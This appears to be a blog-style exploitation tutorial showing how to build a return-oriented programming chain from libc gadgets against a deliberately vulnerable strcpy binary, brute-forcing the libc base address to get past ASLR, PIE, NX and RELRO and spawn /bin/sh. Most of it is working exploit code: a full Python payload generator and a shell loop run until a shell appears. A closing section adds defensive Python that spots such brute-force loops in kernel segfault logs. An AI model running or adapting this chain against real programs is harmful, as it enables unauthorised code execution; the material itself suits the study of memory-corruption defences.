
Make ROP with BruteForce, bypass NX, ASLR, PIE, RELRO

Simple vulnerable binary:

[jonathan@Archlinux rop-bf]$ cat main.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char buff[32];

    strcpy(buff, argv[1]);   /* unbounded copy of argv[1] into a 32-byte stack buffer */
    return (0);
}

Compiled with "gcc -o main main.c -pie"

Protections of the resulting binary:

PIE      ASLR     NX       RELRO
Enable   Enable   Enable   Full

Search for gadgets with ROPgadget:

[jonathan@Archlinux rop-bf]$ ROPgadget -file ./main -g
Gadgets information
============================================================
0x000003e6: pop %edi | ret
0x00000405: add $0x08,%esp | pop %ebx | ret
0x00000408: pop %ebx | ret
0x00000492: mov (%esp),%ebx | ret
0x0000051c: pop %ebx | pop %esi | pop %ebp | ret
0x0000051e: pop %ebp | ret
0x0000054f: call *%eax
0x00000551: add $0x14,%esp | pop %ebx | pop %ebp | ret
0x00000554: pop %ebx | pop %ebp | ret
0x00000595: mov $0x81ffffff,%esi | ret
0x000005ec: pop %ebx | pop %esi | pop %edi | pop %ebp | ret

Unique gadgets found: 11

Fuck, just 11 gadgets found. :/ So, we search for gadgets in /lib/libc.so.6 instead and bruteforce the libc base address (on 32-bit the randomized base has few enough possible values that a blind loop finds it quickly).

Exploit:

[jonathan@Archlinux rop-bf]$ cat exploit.py
#!/usr/bin/python2
from struct import pack

# Guessed libc base. ASLR picks a different base on every run, so this guess is
# only right some of the time; the shell loop below simply re-runs until it is.
base_addr = 0xb770a000

# 32 bytes of buff plus the saved data up to the return address
p = "a" * 44

# execve /bin/sh generated by RopGadget v3.3 (all offsets are relative to the libc base)
# 1. write "/bin" to .data
p += pack("<I", base_addr + 0x000e07c1)     # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242)                 # padding
p += pack("<I", base_addr + 0x00178020)     # @ .data
p += pack("<I", 0x42424242)                 # padding
p += pack("<I", base_addr + 0x00025baf)     # pop %eax | ret
p += "/bin"
p += pack("<I", base_addr + 0x0006c8ba)     # mov %eax,(%ecx) | ret
# 2. write "//sh" to .data + 4
p += pack("<I", base_addr + 0x000e07c1)     # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242)                 # padding
p += pack("<I", base_addr + 0x00178020 + 4) # @ .data + 4
p += pack("<I", 0x42424242)                 # padding
p += pack("<I", base_addr + 0x00025baf)     # pop %eax | ret
p += "//sh"
p += pack("<I", base_addr + 0x0006c8ba)     # mov %eax,(%ecx) | ret
# 3. NUL-terminate the string at .data + 8
p += pack("<I", base_addr + 0x000e07c1)     # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242)                 # padding
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
p += pack("<I", 0x42424242)                 # padding
p += pack("<I", base_addr + 0x00030bb0)     # xor %eax,%eax | ret
p += pack("<I", base_addr + 0x0006c8ba)     # mov %eax,(%ecx) | ret
# 4. ebx = @ .data (pathname)
p += pack("<I", base_addr + 0x000e07c1)     # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242)                 # padding
p += pack("<I", 0x42424242)                 # padding
p += pack("<I", base_addr + 0x00178020)     # @ .data
# 5. ecx = @ .data + 8 (argv, points at the NULL written in step 3), ebx = @ .data
p += pack("<I", base_addr + 0x000e07c1)     # pop %edx | pop %ecx | pop %ebx | ret
p += pack("<I", 0x42424242)                 # padding
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
p += pack("<I", base_addr + 0x00178020)     # @ .data
# 6. edx = @ .data + 8 (envp, same NULL)
p += pack("<I", base_addr + 0x00001a9e)     # pop %edx | ret
p += pack("<I", base_addr + 0x00178020 + 8) # @ .data + 8
# 7. eax = 11 (execve) and trap into the kernel
p += pack("<I", base_addr + 0x00030bb0)     # xor %eax,%eax | ret
p += pack("<I", base_addr + 0x00026632)     # inc %eax | ret
p += pack("<I", base_addr + 0x00026632)     # inc %eax | ret
p += pack("<I", base_addr + 0x00026632)     # inc %eax | ret
p += pack("<I", base_addr + 0x00026632)     # inc %eax | ret
p += pack("<I", base_addr + 0x00026632)     # inc %eax | ret
p += pack("<I", base_addr + 0x00026632)     # inc %eax | ret
p += pack("<I", base_addr + 0x00026632)     # inc %eax | ret
p += pack("<I", base_addr + 0x00026632)     # inc %eax | ret
p += pack("<I", base_addr + 0x00026632)     # inc %eax | ret
p += pack("<I", base_addr + 0x00026632)     # inc %eax | ret
p += pack("<I", base_addr + 0x00026632)     # inc %eax | ret
p += pack("<I", base_addr + 0x0002dc45)     # int $0x80

print p

Ok, let's go bruteforce:

[jonathan@Archlinux rop-bf]$ while true ; do ./main "$(./exploit.py)" ; done
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
[...]
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
sh-4.2$
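The loop above leaves a distinctive trail on the host: the same program name faulting over and over, each time under a fresh PID and at a different instruction pointer inside libc, until the guessed base matches. The following Python is an added detection example, not part of the original write-up: it parses the kernel's dmesg-style segfault report lines (the sample lines are constructed) and flags a program that crashes in that pattern; the function names and thresholds are this example's own choices.

```python
import re
from collections import defaultdict

# Kernel user-space fault report as printed in dmesg on x86:
# "[ts] comm[pid]: segfault at ADDR ip IP sp SP error N in OBJ[base+size]".
SEGV_RE = re.compile(
    r"^\[\s*(?P<ts>\d+\.\d+)\]\s+(?P<comm>\S+)\[(?P<pid>\d+)\]: segfault at "
    r"(?P<addr>[0-9a-f]+) ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) error (?P<err>\d+)"
)

# Constructed sample: five crashes of ./main within 40 ms, each a fresh PID and a
# different ip inside libc (the guessed base was wrong), plus one unrelated crash.
SAMPLE_LOG = """\
[ 1001.10] main[4101]: segfault at 42424242 ip b7553a9e sp bfa1c330 error 4 in libc.so.6[b7520000+1a9000]
[ 1001.11] main[4102]: segfault at 42424242 ip b75cf7c1 sp bfc01230 error 4 in libc.so.6[b75a0000+1a9000]
[ 1001.12] main[4103]: segfault at 42424242 ip b7615baf sp bf8aa4e0 error 4 in libc.so.6[b75f0000+1a9000]
[ 1001.13] main[4104]: segfault at 0 ip b7692632 sp bfe0f000 error 4 in libc.so.6[b7660000+1a9000]
[ 1001.14] main[4105]: segfault at 42424242 ip b76e0bb0 sp bfd12280 error 4 in libc.so.6[b76b0000+1a9000]
[ 1300.00] editor[2020]: segfault at 8 ip b7700123 sp bfb00010 error 4 in editor[b7600000+100000]
"""

def parse_segfaults(lines):
    """One dict per fault line (ts, pid, ip converted to numbers); other lines are skipped."""
    events = []
    for m in filter(None, map(SEGV_RE.search, lines)):
        ev = m.groupdict()
        ev["ts"], ev["pid"], ev["ip"] = float(ev["ts"]), int(ev["pid"]), int(ev["ip"], 16)
        events.append(ev)
    return events

def find_bruteforce(lines, window=60.0, min_crashes=5):
    """Flag a program that faults >= min_crashes times inside `window` seconds, each time
    under a different PID (a re-exec loop, not one process dying once). distinct_ip close
    to crashes means the faults land at varying addresses: a fixed guess vs a moving base."""
    by_comm = defaultdict(list)
    for ev in parse_segfaults(lines):
        by_comm[ev["comm"]].append(ev)
    hits = {}
    for comm, evs in by_comm.items():
        evs.sort(key=lambda e: e["ts"])
        for i in range(len(evs)):
            j = i                      # grow the run while it stays inside the window
            while j + 1 < len(evs) and evs[j + 1]["ts"] - evs[i]["ts"] <= window:
                j += 1
            run = evs[i:j + 1]
            if len(run) >= min_crashes and len({e["pid"] for e in run}) == len(run):
                hits[comm] = {"crashes": len(run), "distinct_ip": len({e["ip"] for e in run})}
                break
    return hits
```

On a real host, feed it the output of dmesg or the kernel facility of the journal; a hit with distinct_ip close to crashes is worth an alert, while a single program crashing once is just a bug report.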

New feature in a future ROPgadget: ROPmaker for libc bruteforce - http://shell-storm.org/project/ROPgadget/ @jonathansalwan
